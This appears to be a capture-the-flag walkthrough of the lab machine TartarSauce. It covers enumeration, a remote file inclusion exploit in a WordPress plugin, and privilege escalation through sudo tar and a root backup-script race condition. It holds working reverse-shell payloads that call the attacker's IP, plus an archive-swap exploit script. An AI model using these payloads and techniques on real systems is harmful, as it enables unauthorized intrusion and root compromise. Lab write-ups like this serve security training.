TartarSauce

Enumeration

As always, we start with the enumeration phase, scanning the machine for open ports and identifying the services and versions running behind them.

The following nmap command quickly scans the target machine for open ports and saves the output to a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.88 -oN allPorts

  • -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

  • --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

  • -p- scanning the entire port range, from 1 to 65535.

  • -T5 insane mode, the fastest of nmap's timing templates.

  • -Pn skip host discovery, treating the host as online.

  • -n scan without reverse DNS resolution.

  • -oN save the scan result into a file, in this case the allPorts file.

Now that we know which ports are open, let's identify the services and versions running on them. The following command scans these ports in more depth and saves the result to a file:

nmap -sC -sV -p80 10.10.10.88 -oN targeted

  • -sC performs the scan using the default set of scripts.

  • -sV enables version detection.

  • -oN save the scan result into a file, in this case the targeted file.

Let's take a look at the website.

Not much going on. As we can see in the nmap scan, there is a robots.txt file; let's take a look at it.

We see a bunch of subdirectories of the /webservices directory. Let's try to fuzz directories with gobuster.

gobuster dir -u http://10.10.10.88/webservices -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200

  • dir enumerates directories or files.

  • -u the target URL.

  • -w path to the wordlist.

  • -t number of concurrent threads, in this case 200 threads.

Let's take a look at the /webservices/wp directory.

As we can see, it looks pretty awful. If we take a look at the source code, we'll see that the website is trying to load resources from tartarsauce.htb. Let's add the domain name to the /etc/hosts file.

nano /etc/hosts
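The entry just maps the target's IP to the hostname the site references:

```
10.10.10.88    tartarsauce.htb
```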

Now it should look a bit better.

Since the website runs the WordPress CMS, I tried to enumerate WordPress plugins with gobuster.

gobuster dir -u http://10.10.10.88/webservices/wp -w /usr/share/SecLists/Discovery/Web-Content/CMS/wp-plugins.fuzz.txt -t 200

  • dir enumerates directories or files.

  • -u the target URL.

  • -w path to the wordlist.

  • -t number of concurrent threads, in this case 200 threads.

The gwolle-gb plugin is installed. Let's search for known vulnerabilities in that plugin.

searchsploit gwolle

Exploitation

As we can see, there is one Remote File Inclusion vulnerability that we can exploit.

Remote file inclusion is an attack targeting vulnerabilities in web applications that dynamically reference external scripts. The perpetrator's goal is to exploit the referencing function in an application to upload malware from a remote URL located within a different domain.

If we take a look at the exploit, we'll see that the vulnerable ajaxresponse.php script takes an abspath parameter and includes a file called wp-load.php from that path without any sanitization. So if we host a malicious wp-load.php that sends us a reverse shell, and point abspath at our own HTTP server, the file will be fetched and executed, and we'll get a reverse shell.

nano wp-load.php
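The payload only needs to spawn a reverse shell when PHP includes it. A minimal sketch (the IP 10.10.14.8 and port 4444 match the listener used later in this writeup; adjust them to your own machine):

```shell
# Create a minimal wp-load.php payload: when the vulnerable plugin
# includes this file from our HTTP server, PHP executes it and
# connects back to our netcat listener.
cat > wp-load.php <<'EOF'
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1'");
EOF
```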

Now, let's start a simple HTTP server with Python on port 80, serving the directory that contains wp-load.php.

python -m http.server 80

Then, let's set up a netcat listener on port 4444.

nc -lvnp 4444

  • -l listen mode.

  • -v verbose mode.

  • -n numeric-only IP, no DNS resolution.

  • -p specify the port to listen on.

Finally, if we make a request to the following URL, the wp-load.php file will be fetched from our HTTP server and executed, giving us a reverse shell as the www-data user.

curl 'http://tartarsauce.htb/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.8/'

Privilege Escalation

First, let's upgrade to an interactive TTY shell.

script /dev/null -c /bin/bash

Then I press Ctrl+Z to background the shell and execute the following command on my local machine:

stty raw -echo; fg

reset

Terminal type? xterm

Next, I export a few variables:

export TERM=xterm

export SHELL=bash

Finally, I run the following command on my local machine:

stty size

And set the corresponding dimensions in the victim machine (your values may differ):

stty rows 51 columns 236

If we list the sudo privileges of the www-data user, we'll see that we can execute tar as the onuma user.

sudo -l

On the GTFOBins site, we can see a way of getting a shell as the onuma user: tar's --checkpoint-action option executes an arbitrary command at each checkpoint, so running tar through sudo -u onuma spawns a shell as that user.

sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash

To get a more interactive shell, let's set up another netcat listener on port 4444.

nc -lvnp 4444

And send another reverse shell as the onuma user.

bash -i >& /dev/tcp/10.10.14.8/4444 0>&1

Now, let's upgrade to an interactive TTY shell in the same way as before. Once we have one, we can look for scheduled tasks with the pspy tool. Let's transfer the 32-bit version of the binary to the /tmp directory of the machine.

cd /tmp

nc -lvnp 5555 > pspy32

On our local machine.

nc 10.10.10.88 5555 < pspy32

Then, give the binary execution permissions.

chmod +x pspy32

And finally execute it.

./pspy32

We can see that root is executing the /usr/sbin/backuperer file. Let's take a look at it.
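The original script is not reproduced here; the following is a simplified sketch reconstructed from its observed behavior (variable names and the exact temporary-file naming are assumptions):

```shell
# Simplified reconstruction (sketch) of /usr/sbin/backuperer.
cat > backuperer_sketch.sh <<'EOF'
#!/bin/bash
basedir=/var/www/html
tmpdir=/var/tmp
check=$tmpdir/check
# hidden temporary file with a pseudo-random (SHA1) name
tmpfile=$tmpdir/.$(head -c100 /dev/urandom | sha1sum | cut -d' ' -f1)

# 1. compress the web root into the hidden temp file
tar -zcf "$tmpfile" "$basedir" 2>/dev/null

# 2. wait 30 seconds -- this is the race-condition window
sleep 30

# 3. extract the archive and diff it against the original;
#    any differences are appended to the error log
mkdir -p "$check"
tar -zxf "$tmpfile" -C "$check"
diff -r "$basedir" "$check$basedir" >> /var/backups/onuma_backup_error.txt
EOF
```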

Basically, the bash script compresses the /var/www/html directory and stores the resulting archive in /var/tmp under a hidden, randomly named file. It then waits 30 seconds, decompresses the archive into the /var/tmp/check directory, and compares the original /var/www/html with the freshly extracted copy; any differences are appended to the /var/backups/onuma_backup_error.txt file. Since the script runs as root, we can swap the temporary archive during the 30-second window for one containing a symbolic link to /root/root.txt, and the diff output will leak the flag. The first step is to compress the /var/www/html directory into the compressed.tar file.

tar -zcvf compressed.tar /var/www/html/

  • -z filter the archive through gzip.

  • -c create new archive.

  • -v verbose mode.

  • -f write the archive to the given file.

Then, send the file to our local machine.

nc -lvnp 5555 > compressed.tar

On the victim machine.

nc 10.10.10.88 5555 < compressed.tar

Then decompress the file on the local machine.

tar -zxvf compressed.tar

  • -z filter the archive through gzip.

  • -x extract the archive.

  • -v verbose mode.

  • -f read the archive from the given file.

And then, make var/www/html/index.html (note the relative path, matching the extracted archive) a symbolic link to /root/root.txt, so the diff will reveal the root flag.

ln -s -f /root/root.txt var/www/html/index.html

  • -s make a symbolic link.

  • -f force.

And then compress the var/www/html directory again into the compressed-mod.tar file.

tar -zcvf compressed-mod.tar var/www/html/

And transfer it to the victim machine.

nc -lvnp 5555 > compressed-mod.tar

On our local machine.

nc 10.10.10.88 5555 < compressed-mod.tar

Finally, I made a bash script which detects when the temporary compressed file is created and replaces it with the malicious one we just made.
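A sketch of what that script can look like (it assumes compressed-mod.tar sits in the current working directory; the exact original script is not reproduced here):

```shell
# exploit.sh (sketch): wait for backuperer's hidden temporary archive
# to appear in /var/tmp, then overwrite it with our malicious archive
# before the script's 30-second sleep expires.
cat > exploit.sh <<'EOF'
#!/bin/bash
# assumes compressed-mod.tar is in the current directory
while true; do
    tmpfile=$(find /var/tmp -maxdepth 1 -type f -name '.*' | head -n 1)
    if [ -n "$tmpfile" ]; then
        cp compressed-mod.tar "$tmpfile"
        echo "[+] Replaced $tmpfile"
        break
    fi
    sleep 1
done
EOF
```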

Now, let's execute it.

chmod +x exploit.sh

./exploit.sh

Now, all we have to do is read the /var/backups/onuma_backup_error.txt file and reap the harvest: the root flag appears in the reported differences.
